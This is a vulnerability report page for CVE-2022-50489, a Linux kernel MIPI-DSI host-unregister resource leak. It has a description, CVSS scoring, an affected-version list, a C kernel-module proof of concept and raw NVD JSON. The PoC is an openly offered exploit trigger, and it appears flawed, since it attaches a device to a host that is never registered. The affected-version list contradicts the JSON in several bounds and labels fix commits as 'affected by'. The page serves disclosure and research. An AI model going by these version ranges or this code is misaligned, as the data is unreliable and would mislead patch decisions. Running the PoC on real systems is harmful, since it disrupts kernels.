Security Vulnerability Report
CVE-2022-50489 CVSS 5.5 MEDIUM

CVE-2022-50489

Published: 2025-10-04 16:15:46
Last Modified: 2026-03-25 00:30:23
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

drm/mipi-dsi: Detach devices when removing the host

Whenever the MIPI-DSI host is unregistered, the code of mipi_dsi_host_unregister() loops over every device currently found on that bus and will unregister it.

However, it doesn't detach it from the bus first, which leads to all kind of resource leaks if the host wants to perform some clean up whenever a device is detached.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux kernel < 5.15.74
Linux kernel 5.16.x < 5.16.18
Linux kernel 5.17.x < 5.17.1
Linux kernel 5.18.x (affected by commit 262364574b05676d4b9ebde2ddd3588cd2efd8ce)
Linux kernel 5.19.x (affected by commit 26c1b4cfe56f040f71a51c92da1f4cac2e3b9455)
Linux kernel 6.0.x (affected by commit 353ab1c13fdd6e524edde780235a8ce9b892c81c)
Linux kernel 6.1.x (affected by commit 45120fa5e522d444e3fc1c5a9afc5d53eed91d00)
Linux kernel 6.2.x (affected by commit 668a8f17b5290d04ef7343636a5588a0692731a1)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * CVE-2022-50489 PoC - Trigger MIPI-DSI host unregister without device detach
 * This PoC demonstrates how to trigger the vulnerability by registering
 * a MIPI-DSI host, attaching devices, and then unregistering the host
 * without proper device detachment.
 */
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/slab.h>		/* kzalloc(), kfree() */
#include <linux/err.h>		/* IS_ERR(), PTR_ERR() */
#include <drm/drm_mipi_dsi.h>

static struct mipi_dsi_host *test_host;
static struct mipi_dsi_device *test_device;

/* Host-side cleanup hook; a host driver releases per-device resources here. */
static int test_host_detach(struct mipi_dsi_host *host,
			    struct mipi_dsi_device *device)
{
	pr_info("CVE-2022-50489: host detach callback called\n");
	/* In vulnerable kernel, this callback is never invoked */
	return 0;
}

static const struct mipi_dsi_host_ops test_host_ops = {
	.detach = test_host_detach,
};

static int __init cve_2022_50489_init(void)
{
	struct mipi_dsi_device_info info = {
		.type = "test-device",
		.channel = 0,
		.node = NULL,
	};

	pr_info("CVE-2022-50489: PoC module loaded\n");

	/* Allocate and register a test MIPI-DSI host */
	test_host = kzalloc(sizeof(*test_host), GFP_KERNEL);
	if (!test_host)
		return -ENOMEM;

	test_host->ops = &test_host_ops;
	/*
	 * Note: In real scenario, host should be properly initialized
	 * (a host driver sets host->dev and calls mipi_dsi_host_register()).
	 */

	/* Create a DSI device attached to the host */
	test_device = mipi_dsi_device_register_full(test_host, &info);
	if (IS_ERR(test_device)) {
		pr_err("Failed to register DSI device\n");
		kfree(test_host);
		test_host = NULL;	/* do not leave a dangling pointer */
		return PTR_ERR(test_device);
	}

	/* Trigger the vulnerability: unregister host without detaching device */
	/* In vulnerable kernel, test_host_detach() will NOT be called */
	mipi_dsi_host_unregister(test_host);

	pr_info("CVE-2022-50489: Host unregistered, check if detach was called\n");
	return 0;
}

static void __exit cve_2022_50489_exit(void)
{
	if (test_host)
		kfree(test_host);
	pr_info("CVE-2022-50489: PoC module unloaded\n");
}

module_init(cve_2022_50489_init);
module_exit(cve_2022_50489_exit);

MODULE_LICENSE("GPL");
MODULE_AUTHOR("Security Researcher");
MODULE_DESCRIPTION("PoC for CVE-2022-50489 - MIPI-DSI host unregister resource leak");

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50489", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:45.827", "lastModified": "2026-03-25T00:30:22.677", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/mipi-dsi: Detach devices when removing the host\n\nWhenever the MIPI-DSI host is unregistered, the code of\nmipi_dsi_host_unregister() loops over every device currently found on that\nbus and will unregister it.\n\nHowever, it doesn't detach it from the bus first, which leads to all kind\nof resource leaks if the host wants to perform some clean up whenever a\ndevice is detached."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.14", "versionEndExcluding": "4.9.331", "matchCriteriaId": "C3749FA3-6386-47BC-BD05-84231EA40A1C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.10", "versionEndExcluding": "4.14.296", "matchCriteriaId": "1927ABC6-E0D2-478F-B103-B982A42D1158"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.15", "versionEndExcluding": "4.19.262", 
"matchCriteriaId": "D6B62970-1FAD-4ED6-930A-23E26A8D2E08"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.20", "versionEndExcluding": "5.4.220", "matchCriteriaId": "125F7133-B3B7-4175-8CF3-FF0845483254"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.150", "matchCriteriaId": "C495821C-2A71-4F09-BED8-6A6EB4C9BA27"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.75", "matchCriteriaId": "6D945F46-F32F-4C09-8400-C3477E22A9FB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "5.19.17", "matchCriteriaId": "19B4C3A4-E5C3-41DC-BB14-BE72858E7D35"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0", "versionEndExcluding": "6.0.3", "matchCriteriaId": "5BCD8201-B847-4442-B894-70D430128DEF"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/262364574b05676d4b9ebde2ddd3588cd2efd8ce", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/26c1b4cfe56f040f71a51c92da1f4cac2e3b9455", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/353ab1c13fdd6e524edde780235a8ce9b892c81c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/45120fa5e522d444e3fc1c5a9afc5d53eed91d00", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/668a8f17b5290d04ef7343636a5588a0692731a1", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6fc2cd40db1969ba372ce9536dcfcdb87271eac4", "source": 
"416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/8242167cfc83dd7e4c96f44b45f108db9bb88146", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/95ae458209f5a556bba98aff872f933694914eb7", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/c202cda08cd5693645d4990ad1eb2e8068a884ec", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}